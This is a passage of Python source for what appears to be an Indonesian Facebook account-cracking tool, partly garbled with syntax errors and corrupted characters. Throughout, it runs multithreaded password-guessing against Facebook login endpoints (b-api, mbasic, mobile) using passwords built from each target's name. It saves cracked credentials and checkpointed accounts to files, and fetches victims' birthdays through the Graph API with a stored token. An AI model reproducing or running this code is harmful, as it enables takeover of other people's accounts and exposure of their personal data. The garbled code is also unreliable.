    else:print(f"{B}[•]{M} Gagal mengganti user agent ");exit()
  elif _pil_ in ["2","02"]:
    try:
       _tes_ua=open("ua","r").read()
    except IOError:
```

```
tes_ua=("Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36_
[FBAN/EMA;FBLC/en_US;FBAV/229.0.0.8.128;]")
     print(f"\{B\}[{\color{red} \bullet}] \; User \; agent \; : \{P\}\{\_tes\_ua\}"); menu()
  elif _pil_ in ["0","00"]:
    menu()
  else:print(f"{M}[•] Pilihan salah ");exit()
#####LOGIN HASIL
def log_hasil(user, pasw):
  ua = "Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36
[FBAN/EMA:FBLC/en US:FBAV/229.0.0.8.128:]"
  ses = requests.Session()
  ses.headers.update({
  "Host": "mbasic.facebook.com",
  "cache-control": "max-age=0",
  "upgrade-insecure-requests": "1",
  "origin": host,
  "content-type": "application/x-www-form-urlencoded",
  "user-agent": ua.
  "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
  "x-requested-with": "mark.via.gp",
  "sec-fetch-site": "same-origin",
  "sec-fetch-mode": "navigate", 
"sec-fetch-user": "?1",
  "sec-fetch-dest": "document",
  "referer": host+"/login/?next&ref=dbl&fl&refid=8",
  "accept-encoding": "gzip, deflate",
  "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"
  })
  data = {}
  ged = par(ses.get(host+"/login/?next&ref=dbl&fl&refid=8", headers={"user-agent":ua}).text, "html.parser")
  fm = ged.find("form",{"method":"post"})
  list = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login","bi_xrwh"]
  for i in fm.find_all("input"):
    if i.get("name") in list:
       data.update({i.get("name"):i.get("value")})
     else:
       continue
  data.update({"email":user,"pass":pasw})
    run = par(ses.post(host+fm.get("action"), data=data, allow_redirects=True).text, "html.parser")
  except requests.exceptions.TooManyRedirects:
    print(f"{M}[•] Akun terkena spam")
  if "c_user" in ses.cookies:
    print(f"{B}[•]{I} Akun berhasil di login")
  elif "checkpoint" in ses.cookies:
    form = run.find("form")
    dtsg = form.find("input",{"name":"fb_dtsg"})["value"]
    jzst = form.find("input",("name":"jazoest"))["value"]
nh = form.find("input",("name":"nh"))["value"]
     dataD = {
       "fb_dtsg": dtsg,
"fb_dtsg": dtsg,
       "jazoest": jzst,
       "jazoest": jzst,
       "checkpoint_data":""
       "submit[Continue]":"Lanjutkan",
    tempek = par(ses.post(host+form["action"], data=dataD).text, "html.parser")
     ngew = [yy.text for yy in tempek.find_all("option")]
     for opt in range(len(ngew))
       jalan(f"{U}[{B}{str(opt+1)}{U}]{P}--->{k}[{B}{ngew[opt]}{K}]")
  elif "login_error" in str(run):
    oh = run.find("div",{"id":"login_error"}).find("div").text
    print(f"{B}[•]{M}>>>> {oh}")
  else:
    print(f"{B}[•]{M} Akun tersebut sandi nya telah di ganti")
def cek_hasil():
  print(f"{B}[•] Masukkan file cp ")
  print(f"{B}[•] Contoh untuk masukkan file: {B}CP/{tanggal}.json")
  files =input(f"{B}[•] Masukkan nama file : {B}")
    buka_baju = open(files,'r').readlines()
  except FileNotFoundError:
     print(f"{B}[•]{M} File tidak di temukan");exit()
     time.sleep(2); cek_hasil()
  print(f"{B}[•] Total akun chekpoint : {P}{str(len(buka_baju))}")
  for memek in buka_baju:
     kontol = memek.replace("\n","")
    titid = kontol.split("|")
    print(f"{B}[•] Akun facebook : {P}{kontol}")
```

```
trv:
       log_hasil(titid[0], titid[1])
    except requests.exceptions.ConnectionError:
    print("")
  input(f"{B}[•]{I} Chek akun sudah selesai")
  menu()
def cek_results():
    open("OK/%s.ison"%(tanggal))
  except IOError:
    os.system("touch OK/%s.json"%(tanggal))
  try:
    open("CP/%s.json"%(tanggal))
  except IOError:
    os.system("touch CP/%s.json"%(tanggal))
  cp=("CP/%s.json"%(tanggal))
  ok=("OK/%s.json"%(tanggal))
  hsl_cp=open(cp,"r").read()
  hsl_ok=open(ok,"r").read()
  print(f"{B}[1] Cek results cp")
  print(f"{B}[2] Cek results ok")
  print(f"{B}[0] Back")
  _{pil3h=input(f"{B}[•] Pilih : {P}")}
  if _pil3h in ["1","01"]:
    if len(hsl_cp) != 0:
       print(f"{B}[•]{M} Results cp{P}")
       os.system("cat CP/%s.json"%(tanggal))
    else:print(f"{M}[•] Tidak ada hasil")
  elif _pil3h in ["2","02"]:
    if len(hsl_ok) != 0:
       print(f"{B}[•]{I} Results ok")
       os.system("cat OK/%s.json"%(tanggal))
    else:print(f"\n{B}[•]{M} Tidak ada hasil")
  elif _pil3h in ["0","00"]:
    menu()
  else:print(f"{B}[•]{M} Pilian tidak ada")
def fii_xd():
kone()
fiisayangwidiya =input(f"{P}[•] Pilih : {B}")
if fiisayangwidiya in [""]:
print(f"{B}[•]{M} Pilihan tidak boleh kosong");exit()
elif fiisayangwidiya in ["1","01"]:
print(f"{B}[•] Tampilan kan opsi akun chek point {B}Y/t")
jalan(f"{B}[•]{P} Terkadang jika menampilkan opsi jarang dapet akun !!!")
_checkoptions_=input(f"{B}[•] Pilih: {P}")
if _checkoptions_ in ["y","Y"]:
try:
_key = "anjink"
key = "anjink" #---- jangan di ubah
if _key in key:
print(f"{B}[•] Crack menggunakan password manual/default {B}M/D")
ter =input(f"{B}[•] Pilih : {P}")
if ter in ["m","M"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
print(f"{B}[•] Contoh password : {B}sayang,anjing,kontol")
asu = input(f"{B}[•] Buat sandi : {P}").split(",")
if len(asu) =="
print(f"{M}[•]{M} Sandi tidak boleh kosong");exit()
started()
for user in id:
uid, name = user.split("<=>")
coeg.submit(api, uid, asu)
exit()
elif ter in ["d","D"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
started()
for user in id:
uid, name = user.split("<=>")
frist=name.split(" ")
if len(frist)>=6:
fii = [name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456"]
elif len(frist)<=2:
fii = [name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456"]
elif len(frist)<=3:
fii = [name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456"]
fii = [ "bismillah", "anjing", "indonesia", "sayang" ]
coeg.submit(api, uid, fii)
exit()
```

```
else:print(f"{B}[•]{M} Eror");exit()
except (KeyError,IOError):print(f"{B}[•]{M} Eror");exit()
print(f"{B}[•] Crack menggunakan password manual/default {P}M/D")
ter =input(f"{B}[•] Pilih : {P}")
if ter in ["m","M"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
print(f"{B}[•] Contoh password : {P}sayang,anjing,kontol")
asu = input(f"{P}[•] Buat sandi : {P}").split(",")
if len(asu) =="
print(f"{B}[•]{M} Sandi tidak boleh kosong")
started()
for user in id:
uid, name = user.split("<=>")
coeg.submit(api, uid, asu)
exit()
elif ter in ["d","D"]:
with ThreadPoolExecutor(max_workers=30) as coeq:
started()
for user in id:
uid, name = user.split("<=>")
frist=name.split(" ")
if len(frist)>=6:
fii = [name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456"]
elif len(frist)<=2
fii = [name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456"]
elif len(frist)<=3
fii = [name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456"]
else:
fii = [ "bismillah", "anjing", "indonesia", "sayang" ]
coeq.submit(apiiii, uid, fii)
exit()
elif fiisayangwidiya in ["3","03"]:
print(f"{B}[•] Tampilkan opsi chekpoint {B}Y/T")
print(f"{B}[•]{M} Terkadang jika menampilkan opsi jarang dapet akun !!!")
_checkoptions_=input(f"{B}[•] Pilih: {P}")
if _checkoptions_ in ["y","Y"]:
try:
_key = "Anjink"
key = "Anjink"
if _key in key:
print(f"{B}[•] Crack menggunakan password manual/default {B}M/D")
ter =input(f"{B}[•] Pilih : {P}")
if ter in ["m","M"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
print(f"{B}[•] Contoh password : {P}sayang,anjing,kontol")
asu = input(f"{B}[•] Buat sandi : {P} ").split(",")
if len(asu) ==
print(f"{B}[•]{M} Sandi tidak boleh kosong anjink");exit()
started()
for user in id:
uid, name = user.split("<=>")
coeg.submit(mbasic, uid, asu)
exit()
elif ter in ["d","D"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
started()
for user in id:
uid, name = user.split("<=>")
frist=name.split(" ")
if len(frist)>=6:
fii = [name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456"]
elif len(frist)<=2:
fii = [name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456"]
elif len(frist)<=3
fii = [name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456"]
else:
fii = [ "bismillah", "anjing", "indonesia", "sayang" ]
coeg.submit(mobil, uid, fii)
exit()
else:print(f"{key}");exit()
except (KeyError,IOError):print(f"{_key}");exit()
print(f"{B}[•] Crack menggunakan pasword manual/defaults {B}M/D")
ter =input(f"{B}[•] Pilih : {P}") if ter in ["m","M"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
print(f"{B}[•] Contoh password {B}Anjink,kontol,sayang")
asu = input(f"{P}[•] Buat sandi : {B}").split(",")
```

```
if len(asu) =="":
print(f"{B}[•]{M} Sandi tidak boleh kosong");exit()
started()
for user in id:
uid, name = user.split("<=>")
coeg.submit(mbasicc, uid, asu)
exit()
elif ter in ["d","D"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
started()
for user in id:
uid, name = user.split("<=>")
frist=name.split(" ")
if len(frist)>=6:
fii = [name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456"]
elif len(frist)<=2:
fii = [name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456"]
elif len(frist)<=3:
fii = [name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456"]
else:
fii = [ "bismillah", "anjing", "indonesia", "sayang" ]
coeg.submit(mobill, uid, fii)
exit()
elif fiisayangwidiya in ["2","02"]:
print(f"{B}[•] Tampilkan opsi chekpoint {B}Y/T")
print(f"{B}[•]{M} Terkadang jika menampilkan opsi jarang dapet akun !!!")
_checkoptions_=input(f"{P}[•] Pilih : {B}")
if _checkoptions_ in ["y","Y"]:
try:
_key = "Anjink"
key = "Anjink"
if _key in key:
print(f"{B}[•] Crack menggunakan password manual/default {B}M/D")
ter =input(f"{B}[•] Pilih : {P}")
if ter in ["m","M"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
print(f"{B}[•] Contoh password : {P}sayang,anjing,kontol")
asu = input(f"{B}[•] Buat sandi : {P} ").split(",")
if len(asu) ==
print(f"{B}[•]{M} Sandi tidak boleh kosong anjink");exit()
started()
for user in id:
uid, name = user.split("<=>")
coeg.submit(mbasic, uid, asu)
exit()
elif ter in ["d","D"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
started()
for user in id:
uid, name = user.split("<=>")
frist=name.split(" ")
if len(frist)>=6:
fii = [name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456"]
elif len(frist)<=2:
fii = [name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456"]
elif len(frist)<=3:
fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
else
fii = [ "bismillah", "anjing", "indonesia", "sayang" ]
coeg.submit(mbasic, uid, fii)
exit()
else:print(f"{key}");exit()
except (KeyError,IOError):print(f"{_key}");exit()
print(f"{B}[•] Crack menggunakan pasword manual/defaults {B}M/D")
ter =input(f"{B}[•] Pilih : {P}")
if ter in ["m","M"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
print(f"{B}[•] Contoh password {P}Anjink,kontol,sayang")
asu = input(f"{B}[•] Buat sandi : {P}").split(",")
if len(asu) ==
print(f"{B}[•]{M} Sandi tidak boleh kosong");exit()
started()
for user in id:
uid, name = user.split("<=>")
coeg.submit(mbasicc, uid, asu)
exit()
elif ter in ["d","D"]:
with ThreadPoolExecutor(max_workers=30) as coeg:
started()
```

```
for user in id:
uid, name = user.split("<=>")
frist=name.split(" ")
if len(frist)>=6:
fii = [name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456"]
elif len(frist)<=2
fii = [name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456"]
elif len(frist)<=3:
fii = [ name, frist[0], frist[0]+"321", frist[0]+"123", frist[0]+"12345", frist[0]+"123456" ]
else
fii = [ "bismillah", "anjing", "indonesia", "sayang" ]
coeq.submit(mbasicc, uid, fii)
exit()
def kone():
      print(f"{B}[1] Method B-api > {P}CEPAT")
      print(f"{B}[2] Method Mbasic > {P}KALEM")
      print(f"{B}[3] Method Mobile > {P}LAMBAT")
def started():
      jalan(f"{B)[•]{P} Results {H}OK {P}tersimpan di {H}OK/{tanggal}")
      jalan(f"{B}[•]{P} Results {K}CP {P}tersimpan di {K}CP/{tanggal}")
      jalan(f"{B}[•] Jika tidak ada hasil mainkan mode pesawat")
      jalan(f"{B}[•] Butuh kesabaran Crack nya lumayan lambat")
      def api(uid, fii):
      try:
              ua = open("ua", "r").read()
       except IOError:
              ua = "NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"
       global ok, cp, loop, token, cookie
      sys.stdout.write(f"\r{B}[\cdot] BAZ> \{P\} \{loop\}/\{len(id)\} \{H\}OK : \{H\}\{len(ok)\} \{K\}CP : \{K\}\{len(cp)\}"\}; sys.stdout.flush()\} \{H\}OK : \{H\}\{len(ok)\} \{H
      for pw in fii:
              headers_ = {"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)), "x-fb-sim-hni": str(random.randint(20000, 40000)), "x-fb-
net-hni": str(random.randint(20000, 40000)), "x-fb-connection-quality": "EXCELLENT", "x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA",
 "user-agent": ua, "content-type": "application/x-www-form-urlencoded", "x-fb-http-engine": "Liger"}
              ses = requests.Session()
              send = ses.get("https://b-api.facebook.com/method/auth.login?
format=json&email="+str(uid)+"&password="+str(pw)+"&credentials_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_t
headers=headers_)
              if "session_key" in send.text and "EAAA" in send.text:
                    print(f"\r{B}----> {H}{uid}•{pw}")
                     ok.append("%s|%s"%(uid, pw))
                     open("OK/%s.json"%(tanggal),"a").write("%s|%s\n"%(uid, pw))
                     break
              elif "www.facebook.com" in send.json()["error_msg"]:
                    try:
                            token = open('login/token.json','r').read()
                            cookie = {'cookie':open('login/cookie.json','r').read()}
                            ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token),cookies=cookie).json()["birthday"]
                            month, day, year = ttl.split("/")
                            month = _bulan_[month]
                            print(f"\r{B}---> \{H\}\{uid\}\bullet\{pw\}\bullet\{day\}\{month\}\{year\}")
                            cp.append("%s|%s"%(uid, pw))
                            open("CP/%s.json"%(tanggal),"a").write("%s|%s|%s %s %s\n"%(uid, pw, day, month, year))
                     except (KeyError, IOError):
                            day = (" ")
                            month = ("
                           year = (" ")
                     except:pass
                    cek_log(uid,pw,ua)
                     print(f"\r{B}---> \{H\}\{uid\}\{pw\}")
                     cp.append("%s|%s"%(uid, pw))
                     open("CP/%s.json"%(tanggal),"a").write("%s|%s\n"%(uid, pw))
                     break
              else:
                     continue
      loop += 1
def apiiii(uid, fii):
      try:
              ua = open("ua", "r").read()
        except IOError:
              ua = "NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"
      global ok, cp, loop, token, cookie
       sys.stdout.write(f"\r{B}[\cdot] BAZ > \{P\} \{loop\}/\{len(id)\} \{H\}OK : \{H\}\{len(ok)\} \{K\}CP : \{K\}\{len(cp)\}"); sys.stdout.flush()\} \{H\}OK : \{H\}\{len(ok)\} \{H\}OK
      for pw in fii:
              pw = pw.lower()
```

```
headers_ = {"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)), "x-fb-sim-hni": str(random.randint(20000, 40000)), "x-fb-sim-hni": str(ra
net-hni": str(random.randint(20000, 40000)), "x-fb-connection-quality": "EXCELLENT", "x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA",
 "user-agent": ua, "content-type": "application/x-www-form-urlencoded", "x-fb-http-engine": "Liger"}
            ses = requests.Session()
            send = ses.get("https://b-api.facebook.com/method/auth.login?
format=json&email="+str(uid)+"&password="+str(pw)+"&credentials_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_password&generate_session_cookies=1&error_detail_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_type=device_based_login_t
headers=headers_)
           if "session_key" in send.text and "EAAA" in send.text:
                 print(f"\r{B}---> \{H\}\{uid\}\{pw\}")
                 ok.append("%sl%s"%(uid. pw))
                 open("OK/%s.json"%(tanggal),"a").write("%s|%s\n"%(uid, pw))
            elif "www.facebook.com" in send.json()["error_msg"]:
                 try:
                       token = open('login/token.json','r').read()
                       cookie = {'cookie':open('login/cookie.json','r').read()}
                       ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token),cookies=cookie).json()["birthday"]
                      month, day, year = ttl.split("/")
                       month = _bulan_[month]
                       print(f"\r{B}---> {H}{uid}•{pw}•{day} {mont} {year}")
                       cp.append("%s|%s"%(uid, pw))
                       open("CP/%s.json%"(tanggal),"a").write("%s|%s|%s %s %s\n"%(uid, pw, day, month, year))
                       break
                 except (KeyError, IOError):
                       day = (" ")
                       month = ("
                       year = (" ")
                 except:pass
                 print(f"\r{B}---> {H}{uid}•{pw}")
                 cp.append("%s|%s"%(uid, pw))
                 open("CP/%s.json"%(tanggal),"a").write("%s|%s\n"%(uid, pw))
                 break
            else:
                 continue
     loop += 1
def mbasic(uid, fii):
ua = open("ua", "r").read()
except IOError:
ua = "NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"
global ok, cp, loop, token, cookie
 sys.stdout.write(f"\r{B}[•] BAZ > {P} {loop}/{len(id)} {H}OK : {H}{len(ok)} {K}CP : {K}{len(cp)}"); sys.stdout.flush() {K}{len(cp)}"); 
 for pw in fii:
fii_gtg = {}
pw = pw.lower()
 ses = requests.Session()
 ses.headers.update({"origin": "https://mbasic.facebook.com", "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7", "accept-encoding": "gzip,
 deflate", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "user-agent": ua, "Host":
 "mbasic.facebook.com", "referer": "https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8", "cache-control": "max-age=0", "upgrade-insecure-
requests": "1", "content-type": "application/x-www-form-urlencoded"})
p = ses.get("https://mbasic.facebook.com/login/?next&ref=dbl&refid=8").text
 b = parser(p,"html.parser")
bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for i in b("input"):
if i.get("name") in bl:fii_gtg.update({i.get("name"):i.get("value")})
else:continue
except:pass
fii_gtg.update({"email": uid,"pass": pw,"prefill_contact_point": ""","prefill_source": ""","prefill_type": ""","first_prefill_source": ""","first_prefill_type": ""","had_cp_prefilled": "false","had_password_prefilled": "false","is_smart_lock": "false","fb_noscript": "true"})
deku = ses.post("https://mbasic.facebook.com/login/device-based/regular/login/?
refsrc=https%3A%2F%2Fmbasic.facebook.com%2F&lwv=100&refid=8",data=fii_qtg)
 if "c_user" in ses.cookies.get_dict().keys():
 kuki = (",").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ]).replace("noscript=1;", "")
print(f"\r{B}----> {H}{uid}•{pw}")
 ok.append("%s|%s"%(uid, pw))
open("OK/%s.json"%(tanggal),"a").write("%s|%s\n"%(uid,pw))
break
elif "checkpoint" in ses.cookies.get_dict().keys():
token = open('login/token.json','r').read()
cookie = {'cookie':open('login/cookie.json','r').read()}
with requests. Session() as sess
ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token),cookies=cookie).json()["birthday"]
month, day, year = ttl.split("/")
month = bulan_ttl[month]
print(f"\r{B}---> {H}{uid}•{pw}•{day} {month} {year}")
 cp.append("%s|%s"%(uid, pw))
 open("CP/%s.json"%(tanggal),"a").write("%s|%s|%s %s %s\n"%(uid, pw, day, month, year))
break
```

```
except (KeyError, IOError):
day = (" ")
month = (" ")
year = (" ")
except:pass
cek_log(uid,pw,ua)
print(f"\r{B}----> {H}{uid}•{pw}")
cp.append("%s|%s"%(uid, pw))
open("OK/%s.json"%(tanggal),"a").write("%s|%s\n"%(uid, pw))
break
else:
continue
loop += 1
def mbasicc(uid, fii):
try:
ua = open("ua", "r").read()
except IOError:
ua = "NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"
global ok, cp, loop, token, cookie
for pw in fii:
fii_gtg = {}
pw = pw.lower()
ses = requests.Session()
ses.headers.update({"origin": "https://mbasic.facebook.com", "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7", "accept-encoding": "gzip,
deflate", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "user-agent": ua, "Host":
"mbasic.facebook.com", "referer": "https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8", "cache-control": "max-age=0", "upgrade-insecure-
requests": "1", "content-type": "application/x-www-form-urlencoded"})
p = ses.get("https://mbasic.facebook.com/login/?next&ref=dbl&refid=8").text
b = parser(p,"html.parser")
bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for i in b("input"):
if i.get("name") in bl:fii_gtg.update({i.get("name"):i.get("value")})
else:continue
except:pass
fii_gtg.update({"email": uid,"pass": pw,"prefill_contact_point": ""","prefill_source": ""","prefill_type": ""","first_prefill_source": ""","first_prefill_type": ""","had_cp_prefilled": "false","had_password_prefilled": "false","is_smart_lock": "false","fb_noscript": "true"})
deku = ses.post("https://mbasic.facebook.com/login/device-based/regular/login/?
refsrc=https%3A%2F%2Fmbasic.facebook.com%2F&lwv=100&refid=8",data=fii_qtg)
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ]).replace("noscript=1;", "")
print(f"\r{B}----> {H}{uid}•{pw}")
ok.append("%s|%s"%(uid, pw))
open("OK/%s.json"%(tanggal),"a").write("%s|%s\n"%(uid, pw))
break
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
token = open('login/token.ison'.'r').read()
cookie = {'cookie':open('login/cookie.json','r').read()}
with requests. Session() as ses:
ttl = ses.qet("https://graph.facebook.com/%s?access_token=%s"%(uid, token),cookies=cookie).json()["birthday"]
month, day, year = ttl.split("/")
month = bulan_ttl[month]
print(f"\r{B}---> {H}{uid}•{pw}•{day} {month} {year}")
cp.append("%s|%s"%(uid, pw))
open("CP/%s.json"%(tanggal),"a").write("%s|%s|%s %s %s\n"%(uid, pw, day, month, year))
break
except (KeyError, IOError):
day = (" ")
month = (" ")
year = (" ")
except:pass
print(f"\r{B}----> {H}{uid}•{pw}")
cp.append("%s|%s"%(uid, pw))
open("CP/%s.json"%(tanggal),"a").write("%s|%s\n"%(uid, pw))
break
else:
continue
loop += 1
def mobil(uid, fii):
try:
ua = open("ua", "r").read()
except IOError:
ua = "NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"
global ok, cp, loop, token, cookie
sys.stdout.write(f"\r{B}[\bullet] BAZ > \{P\} \{loop\}/\{len(id)\} \{H\}OK : \{H\}\{len(ok)\} \{K\}CP : \{K\}\{len(cp)\}"); sys.stdout.flush()\} \{H\}OK : \{H\}\{len(ok)\} \{H\}OK : \{H\}\{l
for pw in fii:
fii_gtg = {}
```

```
pw = pw.lower()
ses = requests.Session()
ses.headers.update({"origin": "https://mobile.facebook.com", "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7", "accept-encoding": "gzip,
deflate", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "user-agent": ua, "Host"
"mbasic.facebook.com", "referer": "https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8", "cache-control": "max-age=0", "upgrade-insecure-
requests": "1", "content-type": "application/x-www-form-urlencoded"})
p = ses.get("https://mobile.facebook.com/login/?next&ref=dbl&refid=8").text
b = parser(p,"html.parser")
bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for i in b("input"):
if i.get("name") in bl:fii_gtg.update({i.get("name"):i.get("value")})
else:continue
except:pass
fii_gtg.update({"email": uid,"pass": pw,"prefill_contact_point": "","prefill_source": "","first_prefill_source": "","first_prefill_type":
"","nad_cp_prefilled": "false","had_password_prefilled": "false","is_smart_lock": "false","_fb_noscript": "true"})
deku = ses.post("https://mobile.facebook.com/login/device-based/regular/login/?
refsrc=https%3A%2F%2Fmbasic.facebook.com%2F&lwv=100&refid=8",data=fii_qtq)
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ]).replace("noscript=1;", "") print(f"\r{B}---> {H}{uid}•{pw}")
ok.append("%s|%s"%(uid, pw))
open("OK/%s.json"%(tanggal),"a").write("%s|%s\n"%(uid, pw))
break
elif "checkpoint" in ses.cookies.get_dict().keys():
token = open('login/token.json','r').read()
cookie = {'cookie':open('login/cookie.json','r').read()}
with requests. Session() as ses:
ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token),cookies=cookie).json()["birthday"]
month, day, year = ttl.split("/")
month = bulan_ttl[month]
print(f"\r{B}----> {H}{uid}•{pw}•{day} {month} {year}")
cp.append("%s|%s"%(uid, pw))
open("CP/%s.json"%(tanggal),"a").write("%s|%s|%s %s %s\n"%(uid, pw, day, month, year))
break
except (KeyError, IOError):
dav = (" ")
month = (" ")
year = (" ")
except:pass
cek_log(uid,pw,ua)
print(f"\r{B}----> {H}{uid}•{pw}")
cp.append("%s|%s"%(uid, pw))
open("CP/%s.json"%(tanggal),"a").write("%s|%s\n"%(uid, pw))
break
else:
continue
loop += 1
def mobill(uid, fii):
ua = open("ua", "r").read()
except IOError
ua = "NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"
global ok, cp, loop, token, cookie
